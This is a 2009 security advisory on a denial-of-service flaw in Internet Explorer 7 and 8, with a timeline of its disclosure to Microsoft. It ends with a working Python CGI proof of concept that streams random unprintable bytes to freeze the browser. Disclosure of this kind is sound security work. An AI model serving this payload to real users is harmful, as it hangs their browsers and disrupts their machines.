BLUE MOON SECURITY ADVISORY 2009-04
===================================


:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
-----------

We could not find out the definitive description for Internet Explorer from Microsoft website. This is our own understanding of the application: Internet Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. When visit a malicious page, the browser may freeze indefinitely and killing it in Task Manager is required. With IE8's default settings, killing the tab process simply launches another process and goes to the same malicious page, hence repeating the cycle. The root cause is unknown to us. We suspect that it is related to the display of unprintable characters on Windows XP, and Vista. The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue and will be addressing it in the next version of the application.

Workaround
----------

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  March 19, 2009: Initial contact sent to secure@microsoft.com.

:Vendor response:

  March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

  March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME format.

  March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and informed us of a new case manager, Jack.

  March 21, 2009: We further reported that IE 8 was affected by the same bug, in PGP MIME format.

  March 30, 2009: We asked if Microsoft had received our PoC.

  March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could not reproduce the behavior of this bug.

  April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista Business. Sent in PGP MIME format.

  April 01, 2009: Jack said the email was stripped out and asked us to resend.

  April 02, 2009: We resent the last email in plain text.

  April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in no case did Internet Explorer hang indefinitely.

  April 06, 2009: We sent Jack a video clip, in PGP MIME format.

  April 06, 2009: Jack asked us to resend because the email was stripped again.

  April 07, 2009: We resent the clip in plain text to Jack.

  April 09, 2009: Jack acknowledged the receipt and let us know the bug would be fixed in the next version of Internet Explorer.

  April 09, 2009: We asked for a confirmation of bug classification.

  April 09, 2009: Jack confirmed this bug was classified as stability, instead of a security issue. We therefore decided to release this advisory to the public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

  #!C:/python25/python
  import sys
  import random
  
  CHAR_SET = [chr(x) for x in range(0x20)]
  CHAR_SET += [chr(x) for x in range(128, 256)]
  
  def send_file():
    l = 800000 + 4096
    print "Content-Type: text/plain"
    print "Content-Length: %d" % l
    print "Cache-Control: no-cache, no-store, must-revalidate"
    # this is not standardized, but use it anyway
    print "Pragma: no-cache"
    print ""
    # bypass IE download dialog
    sys.stdout.write("a" * 4096)
    # print junks
    for i in xrange(l):
      sys.stdout.write(random.choice(CHAR_SET))
    sys.exit()

  send_file()


Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Cheers
-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn